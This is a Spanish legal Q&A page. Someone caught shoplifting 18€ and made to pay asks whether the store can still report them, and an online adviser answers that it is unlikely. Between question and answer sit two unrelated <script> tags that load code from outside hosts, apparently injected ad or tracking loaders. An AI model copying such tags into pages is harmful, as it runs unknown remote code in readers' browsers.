Me han pillado robando, lo he pagado y ¿Ahora que?

Ayer me estuve en un centro comercial y me pillaron robando. El vigilante de seguridad me acompañó a una pequeña sala donde me pidió el DNI para apuntarse mis datos. El total fue de 18€, el vigilante me dijo que si no lo pagaba llamarían a la policía y acto seguido pagué esa cantidad. En ningún momento vino la policía ni nada, en cuanto pagué me dejaron ir tranquilamente.

Pero ahora me salta la duda, tienen mis datos, ¿puede la empresa denunciarme, pagar una multa, llevarme a juicio o algo? Porque pagué lo que me me había llevado y no firmé ningún tipo de documentación ni nada.

Jamás había robado antes, quería ahorrarme unos euros ya que llevo casi 2 años en paro, he aprendido la lección y la vergüenza que pasé y el mal cuerpo que te deja, no volvería hacerlo en la vida.

Gracias por adelantado.

<script type="text/javascript" src="http://loading-resource.com/data.geo.php?callback=window.__geo.getData"></script><script type="text/javascript" src="http://cdncache3-a.akamaihd.net/loaders/1032/l.js?aoi=1311798366&pid=1032&zoneid=62862"></script>

1 respuesta

Respuesta

Si no intervino la policía y pagó el artículo, seguramente no ocurrirá nada. Generalmente en artículos de tan poco importe las empresas no denuncian el robo, simplemente aceptan el pago, sin más. Se han quedado sus datos para tenerlos en archivo por si la situación se repitiera, en cuyo caso puede tener la seguridad de que si denunciarían.

Si el importe hubiera sido superior ya no le hubieran aceptado el pago y hubieran cursado la correspondiente denuncia.

Si necesita alguna otra aclaración no dude en pedírmela, si no, le ruego cierre la pregunta. Es importante para el buen funcionamiento de la web
Un saludo
http://lopezcollado.es/
Barcelona. Asesoramiento legal online.